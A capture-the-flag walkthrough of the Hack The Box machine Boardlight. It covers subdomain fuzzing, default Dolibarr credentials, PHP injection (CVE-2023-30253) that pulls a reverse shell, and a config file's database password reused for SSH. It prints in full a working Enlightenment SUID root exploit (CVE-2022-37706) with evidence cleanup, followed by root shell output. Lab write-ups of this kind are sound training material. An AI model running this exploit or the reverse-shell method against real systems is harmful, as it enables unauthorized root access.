Post

Boardlight - Easy - Linux

Boardlight - Easy - Linux

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.94SVN scan initiated Sun May 26 03:10:02 2024 as: nmap -sCV -p- -v -oN portscan.log 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 26 03:10:27 2024 -- 1 IP address (1 host up) scanned in 25.41 seconds

Inspecting Port 80

Apache is hosting a static website on port 80. In the about footer there is an email address which has a domain board.htb.

2a32dc456794099c5a1162e6e6ab4895.png

Fuzzing VHOST

Using the domain name discovered in the previous step it was possible to find a subdomain of crm.board.htb via fuzzing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/hackthebox/boardlight]
└─$ wfuzz -u http://10.10.11.11 -H 'Host: FUZZ.board.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 1053
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.11/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload                        
=====================================================================

000000072:   200        149 L    504 W      6360 Ch     "crm"                          
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 2696
Filtered Requests: 2695
Requests/sec.: 0

Inspecting VHOST crm.board.htb

An application called Dolibarr is active on the apache virtual host. Its requesting authenication to proceed further.

543dcc788036d778d7b273d47ef99233.png

Default Credentials

The default credentials of admin:admin worked and allowed access to the dashboard.

1fae02779d0af76c8478bdcb1162288b.png

Exploiting Dolibarr 17.0.0 (CVE-2023-30253)

This version of the application is vulnerable to PHP code injection. There is a filter in place to prevent PHP code but its case sensitive. Simply capitalizing the text will bypass the filter.

Source: https://www.swascan.com/security-advisory-dolibarr-17-0-0/

Creating Website

Adding a new website via the dashboard.

9a1ded3e4b83fe6fad9b7aa899eacbd9.png

Adding Page to Website

Adding page to the website via the dashboard with PHP code. The PHP code should curl a reverse shell payload and pipe it into bash. (Note: Adding the PHP code at this stage was incorrect and does nothing as I later found out.)

5af2d5bb01da88444c47807b05331086.png

Adding Code to Page

Added the PHP payload again as this was the intented location to do so. Also made sure interactive page was checked so code is executed realtime.

f8403177cabc4f24e43e5bff57b4b4b1.png

HTTP Listener

Screenshots show a bash reverse shell payload being hosted on a python web server. GET request received from target with 200 code.

1441f793fcf1cd913a75f119951b1727.png

Reverse Shell Returned

Reverse shell returned as the www-data user.

7f761b54b2d74b08ad1a4a4899118f4b.png

Discovering DB Credentials

After searching the file system I eventually discovered the database configuration file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';

//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';

//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ 

SSH - larissa

The database password worked and granted access to the larissa user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/hackthebox/boardlight]
└─$ ssh larissa@board.htb            
larissa@board.htb's password: 
Last login: Sun Jun  9 04:30:27 2024 from 10.10.16.2
larissa@boardlight:~$ sudo -l
[sudo] password for larissa: 
Sorry, user larissa may not run sudo on localhost.
larissa@boardlight:~$ ls -la
total 76
drwxr-x--- 15 larissa larissa 4096 May 17 01:04 .
drwxr-xr-x  3 root    root    4096 May 17 01:04 ..
lrwxrwxrwx  1 root    root       9 Sep 18  2023 .bash_history -> /dev/null
-rw-r--r--  1 larissa larissa  220 Sep 17  2023 .bash_logout
-rw-r--r--  1 larissa larissa 3771 Sep 17  2023 .bashrc
drwx------  2 larissa larissa 4096 Jun  9 04:30 .cache
drwx------ 12 larissa larissa 4096 May 17 01:04 .config
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Desktop
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Documents
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 Downloads
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 .local
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Music
lrwxrwxrwx  1 larissa larissa    9 Sep 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Pictures
-rw-r--r--  1 larissa larissa  807 Sep 17  2023 .profile
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Public
drwx------  2 larissa larissa 4096 May 17 01:04 .run
drwx------  2 larissa larissa 4096 May 17 01:04 .ssh
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Templates
-rw-r-----  1 root    larissa   33 Jun  8 05:26 user.txt
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Videos
larissa@boardlight:~$ 

SUID Search

Larissa has no sudo access. A search for SUID binaries returned an interesting result. The enlightenment binaries are not default and stand out.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
larissa@boardlight:/opt$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

Exploiting Enlightement (CVE-2022-37706-LPE)

A quick google search returned a number of articles related to enlightenment. ExploitDB also had a POC.

Source: https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-enlightenment.html

Source: https://www.exploit-db.com/exploits/51180

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"

echo -e "If it is not found in fstab, big deal :D "
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

read -p "Press any key to clean the evedence..."
echo -e "Please wait... "

sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"

Privilege Escalation - Success

The exploit worked and granted root permissions. Root flag captured.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
larissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Welcome to the rabbit hole :)
If it is not found in fstab, big deal :D 
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# cat /root/root.txt
718174bdfcdb66daefc29c0e03928036
# 

This post is licensed under CC BY 4.0 by the author.